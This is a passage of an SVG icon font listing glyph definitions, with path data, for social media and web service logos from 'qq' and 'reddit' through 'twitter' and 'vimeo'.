<glyph glyph-name="qq" horiz-adv-x="1000" unicode="&#xed60;" d="M900 299c-17 35-36 69-56 97 13 23 10 56 0 79-5 11-14 21-18 32-5 18-5 39-9 56-4 18-9 34-15 50-39 104-122 159-252 175h-54c-41 0-78-13-108-26-33-15-53-32-77-55-39-39-83-103-88-174 0-7 1-13 0-18-1-5-6-9-9-15-4-10-5-21-6-33-12-16-23-46-13-72-34-28-68-57-92-103-18-35-35-81-30-138 2-15 4-37 16-40 7-1 15 2 20 4 15 8 30 23 39 38 4 7 5 16 12 22 4-7 5-14 7-21 15-41 39-74 69-98 5-5 13-8 14-14-32-3-57-10-69-31-4-9-8-27-6-40 3-25 32-39 54-46 41-14 95-18 148-14 48 3 79 14 111 33 5 3 9 7 13 8 4 0 12-1 19-2 5 0 14 0 19-1 12-1 26-9 40-13 73-24 196-30 255 8 8 6 20 17 22 31 4 21-11 33-22 42-17 14-37 22-57 34 22 22 39 50 52 81 4 10 6 22 14 30 6-11 12-23 20-34 7-10 16-25 28-25 8 0 15 6 20 13 10 13 15 35 16 55 3 48-9 89-27 125z m-342 339c7 11 19 23 35 25 3 1 13 1 17-1 52-20 50-138 0-156-6-2-15-4-23-1-44 13-52 94-29 133z m-146-2c8 14 21 27 40 26 30 0 48-39 49-77 0-36-17-83-54-79-48 5-57 90-35 130z m-52-161c29 13 61 22 96 27 92 13 184 0 246-37 6-3 18-10 19-14 0-8-23-18-29-21-12-5-22-10-39-10 3 9 17 14 22 24-44-29-101-58-177-52-51 5-89 29-122 52 3-9 10-14 13-23-16 3-39 8-53 16-4 2-10 7-10 11-1 9 25 22 34 27z m-10-554c-59-3-118 3-152 27-7 5-19 15-16 27 4 14 20 20 29 29-9 1-14-3-22-3-7 10 4 18 13 24 14 8 25 15 43 15 2 0 5 1 6 1 5-1 16-11 22-15 52-36 121-59 197-68-19-27-70-35-120-37z m466 100c-12-3-27-1-30-12 26-2 66 5 60-29-2-8-8-18-15-23-25-21-79-34-129-32-50 2-102 10-126 30 82 11 141 47 191 90 22-1 39-12 49-24z m-14 127c-9-34-30-65-49-87-14-16-36-35-57-49-22-14-46-27-70-36-25-9-51-14-78-14-74 1-151 17-207 50-28 17-51 36-71 60-20 23-38 53-45 85-2 12-5 27-5 37-1 42 10 101 34 125 16-8 30-17 44-27-4-29-7-60-6-94 1-10 0-21 3-30 8-22 33-36 62-39 16-1 35-1 48 4 8 4 18 14 20 25 2 14-1 32-1 48 0 16-2 31-2 44 126-33 260 11 342 67 28-42 56-101 38-169z m-57 47c4-2 6-5 10-7-4 9-2 20-7 27-11 15-33 0-36-16-4-19 15-22 29-19 5-5 16-3 15 5-5-15-27 5-11 10z m-4 1c-2-2-3 2-6 1-3-1-3-5-3-10-17 1 6 35 9 9z m-7-8c1 3 0 7 3 6-1-2 0-6-3-6z m8 0c0 2 2 2 3 4-3 1-6-3-3-4z m-40-8c-8-1-15 14-5 15 5 0 6-7 11-7-1 2-2 4-3 5 1 11-1 19-6 24-13 12-36-7-35-24 1-14 17-15 30-13 5-5 16-2 16 5-4-2-3-5-8-5z m-17 8c-11-2-4 17 2 19 4-1 6-6 7-11-2-2-3 2-6 1-3-1-3-6-3-9z m3 0c-2 1 0 5 1 7 3-1 0-5-1-7z m7 0c0 2 4 3 2 5-1-1-6-4-2-5z m-120 381c6 5 5 24 15 23 9-2 2-24 18-22 6 14 0 32-10 37-13 6-25-4-29-15-2-8-5-22 6-23z m-100-18c25-1 28 68-1 64-26-3-24-62 1-64z" />
<glyph glyph-name="readernaut" horiz-adv-x="1000" unicode="&#xed61;" d="M94 435c21 69 76 82 85 84 55 127 182 217 331 217 150 0 278-90 332-218 1 0 3-1 5-1v171c-19 8-33 26-33 48 0 28 24 52 53 52s52-24 52-52c0-25-17-45-40-50v-185c17-13 35-33 44-66 0 0 18-85-11-107 0 0-14-19-55-35-3-12-7-23-11-35-15-2-31-5-49-9 25 44 40 94 40 147 0 170-148 308-330 308-182 0-329-138-329-308 0-55 15-106 41-150-15 3-29 6-43 9-5 12-9 24-12 37l-1 0c-43 16-58 36-58 36-28 22-11 107-11 107z m406-380c-126 152-437 166-437 166v-116c281-2 437-193 437-193s156 191 438 193v116s-312-14-438-166z m298 287c0-36-7-71-20-103-96-22-212-63-278-143-63 76-173 118-266 140-13 33-21 69-21 106 0 159 131 288 293 288 161 0 292-129 292-288z m-430 46c0 17-15 32-33 32-18 0-33-15-33-32s15-33 33-33c18 0 33 15 33 33z m77 81c0 28-22 50-50 50s-51-22-51-50c0-27 23-49 51-49 28 0 50 22 50 49z" />
<glyph glyph-name="reddit" horiz-adv-x="1000" unicode="&#xed62;" d="M688 317c2-5 3-11 3-17 0-12-4-24-11-33-6-10-16-17-27-20l-1 0h0c-5-2-11-3-16-3-13 0-25 5-35 12-10 8-18 19-20 33v0c-1 3-1 7-1 10 0 12 4 23 10 32 7 9 16 16 26 20h1c6 2 12 3 18 3 12 0 23-4 32-10 10-6 17-15 21-27l0 0c0 0 0 0 0 0z m-35-141c-4 3-10 5-15 5-4 0-9-1-13-4-39-23-84-36-129-36-34 0-68 7-98 22l-1 1 0 0c-4 2-10 6-15 9-3 2-6 4-10 5-3 2-7 3-11 3-3 0-6-1-10-2l0-1c-6-2-10-5-13-10-2-4-4-10-4-15 0-5 1-9 4-14 2-4 5-7 10-10 43-29 95-42 146-42 47 0 93 10 135 30l0 0 0 0c6 3 13 6 20 11 3 2 7 4 10 7 2 4 5 8 6 12 1 3 1 5 1 7 0 3-1 7-3 10-2 5-5 9-10 12z m-306 71c0 0 0 0 0 0 6-2 12-3 17-3 15 0 28 6 39 15 10 10 17 23 17 38v2c0 0 0 1 0 2 0 15-7 29-17 38-10 10-24 16-38 16-4 0-8-1-12-2h0c-19-4-35-18-41-37v0c-2-5-3-11-3-16 0-12 4-23 11-33 6-9 16-16 27-20l0 0z m590 137c0-2 1-3 1-5 0-22-7-42-19-59-10-17-25-30-42-39 1-9 2-17 2-26 0-46-16-91-43-127h0c-51-67-129-107-208-127h0c-42-11-85-16-129-16-64 0-129 12-189 36v0h0c-62 26-122 67-158 127-20 32-31 69-31 107 0 8 1 17 2 25-16 10-31 23-41 38-11 17-19 37-19 58v0c0 29 12 57 32 77s47 34 75 34h2c3 0 6 0 9 0 14 0 29-2 42-7l1-1h0c11-5 23-10 34-19 3 2 7 4 11 6 63 37 136 51 208 56 1 35 5 72 22 105 15 27 40 48 69 55l1 0h0c11 2 23 3 34 3 30 0 60-7 88-18 12 19 30 33 51 41l0 0 0 1c12 3 25 6 38 6 14 0 27-3 40-9l0 0c19-7 34-20 46-36 11-17 17-36 17-56 0-4 0-8 0-12v0c-3-26-16-49-34-65-19-16-44-26-69-26-4 0-8 0-12 0-24 2-48 14-65 32-17 18-28 42-28 67 0 2 1 3 1 4-24 11-48 19-73 19-3 0-7 0-11-1-18-1-35-13-43-30v0c-13-24-15-53-16-81 71-5 142-22 204-57h0l1-1c1-1 3-2 5-3 4 4 9 7 14 10 19 13 41 19 63 19 10 0 20-1 30-4l0 0 1 0c22-6 43-19 58-36 16-18 26-40 28-65z m-207 231c0-1 0-2 0-3v0c0-12 6-24 15-32 9-9 20-14 32-14h1c1 0 1 0 2 0 12 0 24 5 33 14 9 8 15 19 15 32v0c1 1 1 2 1 3 0 13-6 25-16 34-9 9-21 14-34 14-4 0-8 0-11-2h-1c-10-2-19-8-26-17-7-8-11-18-11-29z m-520-189c-10 5-20 8-29 8-2 0-3 0-5-1h0c-14 0-28-6-39-16-10-9-17-22-18-37v0c0-1 0-2 0-3 0-9 3-18 8-26 3-5 8-11 13-15 16 35 41 65 70 90z m614-173c0 32-12 63-30 89-37 51-94 84-153 103l-1 0c-11 3-23 7-34 9-35 8-70 12-106 12-47 0-95-7-141-21-59-19-116-52-153-103-18-26-29-58-29-89 0-12 1-24 4-35 7-25 20-48 37-68 17-20 38-37 59-50 5-3 10-6 15-9 63-35 136-51 208-51 13 0 25 1 37 2 73 6 146 27 205 71 19 14 36 31 50 50 14 19 24 40 29 64v0c2 8 3 17 3 26z m57 126c0 7-2 15-6 22l0 0v0c-5 11-13 19-23 24s-21 8-32 8c-10 0-21-2-30-6 29-26 55-56 71-91 5 4 10 10 13 16 5 8 7 18 7 27z" />
<glyph glyph-name="renren" horiz-adv-x="1000" unicode="&#xed63;" d="M426 507v277c-68-12-130-38-185-78s-99-92-131-154c-32-62-47-128-47-199 0-106 34-200 103-282 77 38 140 96 188 175s72 166 72 261z m464 45c-32 62-75 113-131 153-55 41-117 67-185 79v-277c0-95 24-183 72-261 48-79 111-137 188-175 69 82 104 176 104 282 0 71-16 137-48 199z m-316-462c-37 47-62 98-76 153-12-55-37-106-74-153-37-47-82-87-135-120 65-36 135-54 209-54 75 0 145 18 210 54-52 33-97 73-134 120z" />
<glyph glyph-name="rss" horiz-adv-x="1000" unicode="&#xed64;" d="M64 323c109 0 212-43 288-120 77-78 120-181 120-290h168c0 318-258 577-576 577l0-167z m1 297c388 0 703-317 703-707h168c0 482-391 875-871 875l0-168z m232-590c0-65-52-117-117-117-64 0-116 52-116 117s52 116 116 116c65 0 117-52 117-116z" />
<glyph glyph-name="shopify" horiz-adv-x="1000" unicode="&#xed65;" d="M634 682l-27-8c-11 35-27 59-47 73-15 11-31 15-49 14-4 5-8 9-12 13-20 15-45 18-75 7-89-33-127-149-141-207l-78-24s-19-6-23-11c-5-5-6-21-6-21l-66-512 498-93 39 770c-6 1-11 0-13-1z m-127-39l-86-26c12 44 34 90 76 108 8-23 11-54 10-82z m-72 110c18 6 32 6 43-1-57-26-81-91-92-146l-69-22c15 56 50 144 118 169z m48-378c-4 2-8 4-14 6-5 2-11 4-17 6-6 1-13 2-20 3-7 1-15 1-22 1-7-1-14-2-19-4-6-2-11-5-15-8-4-4-7-8-9-12-2-5-4-10-4-16 0-4 1-8 2-12 2-4 4-8 7-12 3-4 8-8 13-12 5-4 10-8 17-12 10-6 20-13 29-21 9-8 18-17 26-27 7-11 14-23 18-36 5-13 7-27 6-43-1-27-7-49-16-68-10-19-23-33-38-44-15-10-33-16-52-19-19-2-39-1-60 3l0 0-1 0 0 1-1 0c-9 2-19 5-27 9s-17 7-25 11c-7 5-13 9-19 14-6 4-11 9-14 14l22 76c4-3 9-7 14-11 6-4 12-8 18-11s14-7 21-10c8-3 15-5 22-6 7-1 13-1 18 0 5 1 10 3 13 6 4 3 7 7 9 11 2 5 3 10 3 15 1 5 0 10-1 15-2 4-4 9-7 14s-7 9-12 14c-5 4-11 9-18 14-9 7-17 14-24 22-7 7-14 15-19 24-5 9-9 18-12 29-3 10-4 21-3 33 1 21 5 39 11 56 7 17 17 32 29 45 13 14 28 25 45 34 18 9 39 15 61 18 11 1 21 2 30 2 10 0 19 0 28-2 8-1 16-2 23-4 7-2 13-4 18-7l-34-99z m54 278c0 3 0 6 0 10-1 27-4 49-11 68 7-1 13-3 19-7 16-11 27-34 35-58l-43-13z m258-37s-1 4-3 6-5 1-5 1l-70 6-52 51c-2 2-4 2-7 3l-38-771 270 59-95 645z" />
<glyph glyph-name="silverstripe" horiz-adv-x="1000" unicode="&#xed66;" d="M334 327c-35-23-81-15-105 20s-15 81 20 104l0 0 186 128c68 47 86 140 39 209l-310-213 0 0c-103-70-129-210-59-313 70-103 211-129 313-59v0c69 47 86 140 40 209l-124-85z m561 111c-70 103-210 129-313 59l0 0-1-1 1 1c-69-47-86-140-39-209l124 85c34 23 81 15 104-20 24-34 15-81-19-104l-186-128c-69-46-86-140-40-209l311 213c102 70 129 211 58 313z" />
<glyph glyph-name="skype" horiz-adv-x="1000" unicode="&#xed67;" d="M901 287c3 20 5 42 5 63 0 224-182 406-406 406-21 0-43-2-63-5-38 23-82 37-129 37-136 0-245-110-245-246 0-47 13-91 36-128-3-21-5-42-5-64 0-224 182-406 406-406 21 0 43 2 63 5 38-23 82-36 129-36 136 0 245 110 245 245 1 47-13 91-36 129z m-208-122c-17-24-43-44-76-57-33-14-72-21-117-21-54 0-99 9-134 28-25 14-45 32-61 55-16 23-24 45-24 67 0 13 5 24 15 34 10 9 22 13 37 13 12 0 22-3 31-10 8-8 15-18 21-32 7-16 14-29 22-40 8-10 19-19 33-26 15-7 34-10 57-10 33 0 59 7 79 21 20 14 30 31 30 51 0 16-5 29-16 40-11 10-25 18-42 23-18 6-41 11-70 18-39 8-72 18-99 30-26 11-48 27-63 47-16 20-24 45-24 74 0 28 8 53 25 75 16 22 40 39 72 51 31 12 68 18 110 18 33 0 63-4 87-12 25-8 45-18 62-31 16-13 28-27 35-41 8-14 12-28 12-42 0-12-5-24-15-34-9-10-22-15-36-15-13 0-23 3-30 9-7 6-14 16-22 29-9 19-21 34-35 44-13 11-35 16-66 16-28 0-51-6-68-17-17-12-25-25-25-40 0-10 3-18 8-26 6-7 14-13 24-18 11-5 21-9 32-12 10-3 28-8 52-13 31-7 59-14 84-23 25-8 46-17 64-29 18-12 32-26 42-44 10-18 15-40 15-66 0-31-9-59-26-84z" />
<glyph glyph-name="slack" horiz-adv-x="1000" unicode="&#xed68;" d="M937 326l-1 3c-10 30-39 51-72 50-9 0-17-1-25-4l-86-29-56 166c81 28 83 28 83 28 35 12 64 48 52 89l-1 3c-11 31-39 51-73 51-7 0-15-1-23-3l-85-29-29 84c-6 20-20 36-38 45-11 5-23 8-35 8-8 0-16-2-24-4-38-13-60-55-49-94l1-3 29-85-164-55-29 84c-10 32-40 53-73 52-8 0-16-1-24-4-39-13-60-54-49-93 0-1 1-2 1-4l28-83-83-28c-39-13-60-54-49-93 0-1 1-2 1-4 10-30 38-50 71-50 8 1 17 2 25 5 29 10 57 19 83 28l55-164-82-28c-39-13-61-55-50-94 1-2 1-3 2-4 10-30 38-49 71-49 9 0 18 2 26 4l81 28 29-85c11-32 40-53 73-53 9 1 17 2 24 4 39 14 61 55 49 94 0 1 0 2-1 4l-29 86 164 56 29-87c11-32 40-53 74-52 8 0 16 1 23 4 39 13 61 54 49 95l0 2-30 87 91 31s28 13 37 26c12 19 15 43 9 64z m-493-84l-56 164c65 23 119 41 164 56l55-165-163-55z" />
<glyph glyph-name="slashdot" horiz-adv-x="1000" unicode="&#xed69;" d="M145-81l386 869h168l-387-869h-167z m709 132c0 76-62 138-138 138s-139-62-139-138c0-77 62-138 139-138s138 61 138 138z" />
<glyph glyph-name="slidshare" horiz-adv-x="1000" unicode="&#xed6a;" d="M552 351c21-20 45-30 74-30 28 0 53 10 72 30 20 19 30 44 30 72s-10 53-30 74-44 30-72 30-53-10-74-30-30-45-30-74c0-28 10-53 30-72z m366 24c-10 0-20-3-29-10v423h-781v-423c-16 10-28 12-38 5-4-4-1-16 9-34 50-50 110-91 180-121-15-46-20-93-16-140 6-45 22-83 50-115 27-32 62-48 104-48 22 0 41 7 60 22 18 14 27 31 27 52v184c1 0 6-1 14-4 8-3 13-4 17-4v-173c0-12 3-23 8-32 20-28 46-41 79-41 43 1 78 17 105 47 27 31 43 69 49 113 4 47-1 94-16 142 4 1 15 6 34 15 19 10 32 16 40 21 8 5 20 12 37 21 16 10 29 19 37 27 9 8 17 18 26 29 8 11 14 22 18 32 1 8-4 12-14 12z m-75-37c-5-4-17-9-34-17l-612-7c-6 2-13 6-23 11-10 5-17 9-21 11v405h690v-403h0z m-535 13c21-20 45-30 74-30 28 0 52 10 72 30 20 19 30 44 30 72s-10 53-30 74-44 30-72 30-53-10-74-30-31-45-31-74c0-28 11-53 31-72z" />
<glyph glyph-name="smugmug" horiz-adv-x="1000" unicode="&#xed6b;" d="M416 722c0-36-38-66-84-66-47 0-85 30-85 66 0 36 38 66 85 66 47 0 84-30 84-66z m296 66c-46 0-84-30-84-66 0-36 38-66 84-66 47 0 85 30 85 66 0 36-38 66-85 66z m226-334c0-65-145-542-517-542-371 0-413 350-310 566 21 43 42 47 42 47h723s62-6 62-71z m-88-16h-663c-44-88-62-228-3-328 54-91 159-110 237-110 282 0 408 350 429 438z" />
<glyph glyph-name="snapchat" horiz-adv-x="1000" unicode="&#xed6c;" d="M936 583c0 16-1 31-4 47-4 19-9 37-18 54-9 19-21 35-36 49-23 22-49 37-80 45-27 8-55 9-84 9 0 0 0 0 0 0h-428v0c-17 0-33 0-49-2-17-2-35-5-51-11-26-10-49-25-68-45-22-23-38-49-46-80-7-27-9-55-9-83l0-431c0-19 1-39 4-58 3-20 8-40 18-59 13-25 30-46 52-64 16-12 34-22 53-28 28-9 57-13 86-13 19 0 37 0 55 0 134 0 267-1 400 1 18 0 35 2 53 5 33 6 63 20 88 43 29 26 49 58 58 97 5 25 7 51 7 76v5c0 2-1 437-1 443z m-108-401c0-2-1-5-2-7-3-7-10-13-22-19-14-6-36-12-64-16-1-3-3-10-4-15-1-5-2-10-4-15-2-8-8-13-17-13h0l0 0c-4 0-9 1-15 2-10 2-21 4-35 4-8 0-16-1-24-2-17-3-30-13-46-24-24-16-50-35-91-35-2 0-3 0-5 0-1 0-2 0-3 0-41 0-67 19-91 35-16 12-30 21-46 24-8 1-16 2-24 2-15 0-26-2-35-4-6-1-10-2-15-2-11 0-16 7-17 13-2 5-3 10-4 15-1 5-3 12-4 14-28 5-50 10-64 17-12 6-19 12-23 19 0 2-1 5-1 7-1 8 5 15 13 16 19 3 38 11 56 22 14 9 27 21 40 35 21 25 32 49 33 51 0 1 0 1 0 1 4 9 5 17 3 23-5 11-23 17-35 21-4 1-7 2-10 3-10 4-19 9-24 14-10 9-10 18-10 23 2 7 7 13 14 18 6 3 13 5 20 5 4 0 8-1 11-2 11-5 21-8 29-8 5 0 9 1 11 2l-1 15v0c-3 44-6 100 9 133 10 22 23 41 40 57 13 13 29 24 47 32 32 14 61 15 75 15 1 0 8 0 12 0h1c15 0 44-2 75-15 18-8 34-19 48-32 17-16 30-35 40-57 15-33 12-89 9-133l0-2c-1-5-1-9-1-13 2-1 5-2 9-2 8 1 17 3 27 8 5 2 10 3 13 3 5 0 10-1 15-3 13-5 21-14 21-25 0-4-1-11-8-18-6-5-14-10-26-15-3-1-7-2-10-3-12-4-31-10-35-21-3-6-2-14 3-23l0-1c2-3 41-93 129-108 8-1 13-8 13-16z" />
<glyph glyph-name="soundcloud" horiz-adv-x="1000" unicode="&#xed6d;" d="M280 413c-8 0-16-3-22-9s-9-13-9-22v-251h0c0-8 3-14 9-18s13-6 22-6c9 0 16 2 22 6s8 10 8 18v251c0 9-3 16-9 22-6 6-13 9-21 9z m-188-70c-8 0-15-3-21-9-6-6-9-13-9-21v-119c0-10 4-19 12-24 8-6 17-8 26-6 8 2 14 5 17 9 4 4 5 11 5 22v118c0 8-2 15-8 21-6 6-13 9-22 9z m94 106c-8 0-15-3-21-9-6-6-9-13-9-21v-275c0-8 3-14 9-18 5-4 12-6 21-6 9 0 16 2 22 6s8 10 8 18v275c0 8-3 15-8 21-6 6-13 9-22 9z m197 127c-9 2-18-1-27-8s-13-18-13-31v-407c0-15 10-23 30-23s30 8 30 23v407c0 23-7 36-20 39z m514-234c-27 27-59 40-97 40-19 0-37-3-53-10-4 40-17 78-39 111s-51 61-87 80c-35 20-74 30-116 30-17 0-36-2-54-7-8-2-13-11-13-25v-443c0-2 1-3 2-6s3-3 6-4l354-1c38 0 70 14 97 41s41 59 41 97c0 38-14 70-41 97z" />
<glyph glyph-name="spotify" horiz-adv-x="1000" unicode="&#xed6e;" d="M500 787c-242 0-437-195-437-437s195-438 437-438 438 196 438 438-196 437-438 437z m201-630c-8-13-25-17-38-10-102 63-232 77-384 43-15-4-29 5-33 20-3 15 6 29 21 33 167 38 309 21 425-49 13-8 17-25 9-37z m53 119c-10-16-31-21-47-12-117 73-297 94-436 51-18-5-37 5-42 23-6 18 4 37 22 43 159 48 357 25 492-58 16-10 21-31 11-47z m5 124c-141 83-374 91-508 50-22-6-45 6-51 28-7 21 5 44 27 51 154 46 411 37 574-59 19-11 25-37 14-56s-37-26-56-14z" />
<glyph glyph-name="stack-exchange" horiz-adv-x="1000" unicode="&#xed6f;" d="M147 405h706v-145h-706z m0-185v-38c0-32 11-60 33-82 22-23 48-34 79-34h301v-154l149 154h32c31 0 57 11 79 34 22 22 33 50 33 82v38h-706z m0 372h706v-145h-706z m706 80c0 32-11 59-33 82s-48 34-79 34h-482c-31 0-57-12-79-34-22-23-33-50-33-82v-38h706v38z" />
<glyph glyph-name="stack-overflow" horiz-adv-x="1000" unicode="&#xed70;" d="M310 309l16 67 335-81-16-67z m51 156l31 61 307-157-31-61z m94 153l45 52 260-227-45-52z m138 131l57 39 193-285-57-39z m-298-586l4 68 344-18-3-69z m416 104v-286h-485v286h-69l0-355h623l0 355z m-417-148h347v-69h-347z" />
<glyph glyph-name="steam" horiz-adv-x="1000" unicode="&#xed71;" d="M872 462c0-45-36-81-81-81s-81 36-81 81 36 80 81 80c45 0 81-36 81-80z m-33-137l-98-83c1-7 2-14 2-21 0-71-58-129-129-129-62 0-113 43-126 101l-243 82c-19-15-43-24-68-24-63 0-115 51-115 114 0 63 52 114 115 114 54 0 99-38 111-88l234-79c23 23 54 37 89 38l35 106c0 2 0 4 0 6 0 81 65 146 146 146 80 0 146-65 146-146 0-63-41-117-99-137z m-591 79c-13 25-39 41-69 41-45 0-80-35-80-79s35-80 80-80c8 0 16 1 23 3l-38 13c-31 17-42 54-26 85 17 30 55 42 85 26l25-9z m430 58c0-62 51-113 113-113s114 51 114 113c0 62-51 113-114 113s-113-51-113-113z m2-252c0 48-39 86-86 86-7 0-13-1-20-2l49-16c30-17 42-55 25-85-16-31-54-42-85-26l-52 18c11-35 44-61 83-61 47 0 86 39 86 86z" />
<glyph glyph-name="stumbleupon" horiz-adv-x="1000" unicode="&#xed72;" d="M546 434l60-28 89 27v62c-3 105-89 189-195 189-106 0-191-83-195-188v-283c0-25-21-46-46-46-26 0-47 21-47 46v120h-149v-121c0-108 87-196 195-196 107 0 194 86 196 193l0 279c0 26 20 46 46 46 26 0 46-20 46-46v-54z m242-101v-125c0-26-21-47-46-47-26 0-47 21-47 47v123l-89-27-60 28v-122c1-107 89-194 196-194 108 0 196 88 196 196v121h-150z" />
<glyph glyph-name="tagged" horiz-adv-x="1000" unicode="&#xed73;" d="M459 365c1 25-22 49-47 48-37 1-73 0-110 1-40 1-73 41-67 81 5 33 35 61 69 61 184 0 368 0 552 0 11-1 21 10 18 21-5 12-17 18-27 25l-281 161c-17 10-33 21-53 25h-27c-13-2-24-8-35-14l-303-175c-20-12-35-33-38-57v-379c1-24 16-47 37-59 39-23 78-45 118-68 8-6 21-7 28 1 7 7 10 16 14 24l138 263c6 13 15 26 14 41z m431 48l-142 0c-58 1-114-34-141-85-65-126-131-251-195-377 25-13 48-32 76-39h23c17 4 32 13 47 22l275 159c17 9 34 19 45 34 9 13 12 29 12 44 0 80 0 161 0 242z" />
<glyph glyph-name="technorati" horiz-adv-x="1000" unicode="&#xed74;" d="M205 760c41 5 83 2 124 3-42-52-78-112-84-180-12-105 42-209 123-273 21-12 13-38 12-59-5-49-12-99-16-149 64 36 120 84 185 118 131-25 274-10 388 63 0-57 0-115 0-173 2-66-39-131-99-158-28-14-60-16-91-15-173 0-347 0-521 0-87 1-163 79-163 166-1 160 0 320 0 480-5 83 61 162 142 177z m229-112c-29-31-50-71-50-114-4-58 29-113 74-147 96-73 235-79 339-21 58 32 105 92 106 160 2 60-33 117-81 151-54 39-122 57-189 54-73-1-148-29-199-83z" />
<glyph glyph-name="telegram" horiz-adv-x="1000" unicode="&#xed75;" d="M500 788c-242 0-437-196-437-438s195-438 437-438 438 196 438 438-196 438-438 438z m135-646s-11-27-41-14l-112 85-68 54 0 2s200 180 208 188l6 9c0 9-15 0-15 0l-265-168-110 37s-17 6-19 19c-2 13 19 20 19 20l439 172s36 16 36-10l-78-394z" />
<glyph glyph-name="tinder" horiz-adv-x="1000" unicode="&#xed76;" d="M349 554c4-22 6-42 10-62 6-25 18-46 33-67 5-6 9-6 15-2 69 51 120 114 135 202 9 51 4 101-12 150-1 4-2 7-4 13 3-2 4-2 5-3 99-93 186-195 245-318 41-86 65-176 59-272-7-119-64-204-175-249-129-51-256-46-376 27-58 36-100 85-115 154-11 51-3 101 12 150 26 85 72 158 126 227 14 17 28 33 42 50z" />
<glyph glyph-name="trello" horiz-adv-x="1000" unicode="&#xed77;" d="M852 788h-704c-47 0-85-39-85-86v-704c0-47 38-85 85-85h704c47 0 85 38 85 85v704c1 47-38 86-85 86z m-409-675c0-22-18-41-41-41h-185c-22 0-41 19-41 41v520c0 22 19 41 41 41h185c23 0 41-19 41-41v-520z m381 219c0-23-19-41-41-41h-185c-23 0-41 18-41 41v301c0 22 18 41 41 41h185c22 0 41-19 41-41v-301z" />
<glyph glyph-name="tumblr" horiz-adv-x="1000" unicode="&#xed78;" d="M576 72c-14 9-28 24-33 38-6 15-5 44-5 95v224h204v156h-204v203h-125c-6-45-16-83-31-112-15-29-35-54-60-75-25-21-65-37-99-48v-124h119v-307c0-40 5-70 13-92 9-21 24-41 46-59 22-19 48-33 79-43 31-11 55-16 95-16 36 0 69 4 99 11 31 7 65 20 103 37v138c-44-29-89-43-134-43-25 0-47 6-67 17z" />
<glyph glyph-name="twitch" horiz-adv-x="1000" unicode="&#xed79;" d="M139 787l-57-152v-608h209v-115h114l114 115h171l228 228v532h-779z m703-494l-133-133h-209l-114-114v114h-171v551h627v-418z m-418 266h76v-228h-76z m209 0h76v-228h-76z" />
<glyph glyph-name="twitter" horiz-adv-x="1000" unicode="&#xed7a;" d="M938 622c-33-15-67-24-104-29 38 22 66 58 79 100-34-21-73-36-114-44-32 35-79 57-131 57-99 0-179-81-179-180 0-14 1-28 4-41-149 8-281 79-370 188-15-27-24-58-24-90 0-63 32-118 80-150-30 1-57 9-81 23v-3c0-87 61-159 144-176-15-4-31-6-48-6-11 0-23 1-33 3 22-71 89-123 167-124-61-49-139-77-223-77-14 0-28 1-43 2 80-51 174-80 276-80 330 0 510 273 510 510 0 8 0 16 0 24 35 25 66 57 90 93z" />
<glyph glyph-name="typo3" horiz-adv-x="1000" unicode="&#xed7b;" d="M779 316c90 103 182 318 135 401-47 83-199 70-286 70-169 0 57-421 151-471z m-332 460c-164-42-374-63-374-174 0-205 181-690 336-690h34c111 0 240 195 282 274-101-62-414 522-278 590z" />
<glyph glyph-name="ubercart" horiz-adv-x="1000" unicode="&#xed7c;" d="M711 736c-372 84-556-67-556-67-149-104-73-278-73-278 79-235 225-367 225-367 190-174 356-28 356-28 212 178 263 434 263 434 73 230-215 306-215 306z m-180-85h50v-74h-50v74z m-109 0h50v-74h-50v74z m-19-520h-36s-22-1-24 17v48s-2 19 22 18h44s17 3 19-14l1-53c0 0 0-18-26-16z m233 0h-37s-21-1-24 17v48s-2 19 23 18h44s17 3 19-14l1-53s0-18-26-16z m9 107h-290s-21 4-24 28v268h65v-261h210l1 261h64v-268s1-24-26-28z m145 239h-92v42h92v-42z" />
<glyph glyph-name="viber" horiz-adv-x="1000" unicode="&#xed7d;" d="M935 664c-2 14-7 28-14 42-22 44-67 75-117 81-11 1-599 1-610-1-17-1-36-8-53-16-39-21-68-61-76-106-2-9-2-22-2-316v-306l2-10c14-61 57-104 118-117l9-3h616l9 3c61 13 104 56 118 117l2 10v306c0 294 0 307-2 316z m-455-35c4 4 7 4 22 4 8 0 20-1 26-2 32-4 58-12 87-26 28-14 46-27 70-50 22-23 34-39 47-66 19-36 29-80 31-128 1-16 0-20-4-25-7-9-22-7-28 3-2 3-2 6-3 19 0 20-2 33-5 49-11 61-40 109-86 144-39 30-79 44-132 47-18 1-21 2-25 5-7 6-8 19 0 26z m111-121c-19 12-47 20-72 22-9 1-14 3-18 7-5 6-5 14-1 21 5 7 12 8 35 5 57-8 100-35 129-77 17-25 27-53 30-83 1-11 1-32 0-35-1-3-5-8-9-9-3-2-11-2-15 0-7 4-10 10-10 25 0 25-6 50-17 70-12 23-30 41-52 54z m32-124c-6-5-16-6-22-1-5 4-6 7-7 17-1 13-4 22-7 30-9 18-23 27-48 30-11 1-15 2-18 7-7 8-5 21 5 26 3 2 5 2 13 1 5 0 12-1 16-2 18-3 32-10 44-22 16-15 24-32 28-58 3-16 2-23-4-28z m139-246c-6-18-33-51-52-66-17-13-29-18-45-18-13-1-19 0-36 7-131 54-236 135-319 246-43 58-77 118-99 181-13 36-14 52-3 70 5 8 24 28 39 39 24 18 35 24 44 26 6 1 17 0 24-2 3-1 8-4 11-6 18-12 67-75 83-106 9-19 12-32 10-42-3-10-8-16-31-34-8-7-17-14-18-16-3-5-6-15-6-22 0-15 10-44 23-65 11-17 29-39 47-56 22-19 41-33 62-43 27-14 44-17 56-12 3 2 7 4 8 4 1 1 8 10 16 20 15 19 18 22 29 26 13 4 26 3 40-4 10-5 33-19 47-29 19-14 60-47 66-54 9-12 11-27 4-44z" />
<glyph glyph-name="viddler" horiz-adv-x="1000" unicode="&#xed7e;" d="M726 296c117 0 212 93 212 209 0 116-95 210-212 210-106 0-194-78-209-179h-6c-16 101-103 179-209 179-117 0-212-94-212-210 0-114 93-208 208-209v0h7v-72l-242 65v-278l242 72v-98h356l-104 311h169z m-424 150c-33 0-60 26-60 59s27 59 60 59c33 0 59-26 59-59 0-33-26-59-59-59z m369 59c0 33 27 59 60 59 33 0 59-26 59-59 0-33-26-59-59-59-33 0-60 26-60 59z" />
<glyph glyph-name="vimeo" horiz-adv-x="1000" unicode="&#xed7f;" d="M63 524l35-46s73 57 98 29c24-29 117-378 149-442 27-57 102-132 184-78 82 53 355 286 404 562 49 275-329 217-369-22 100 60 154-25 103-120-51-96-98-158-122-158-25 0-44 64-72 175-28 116-28 324-148 300-114-22-262-200-262-200z" />
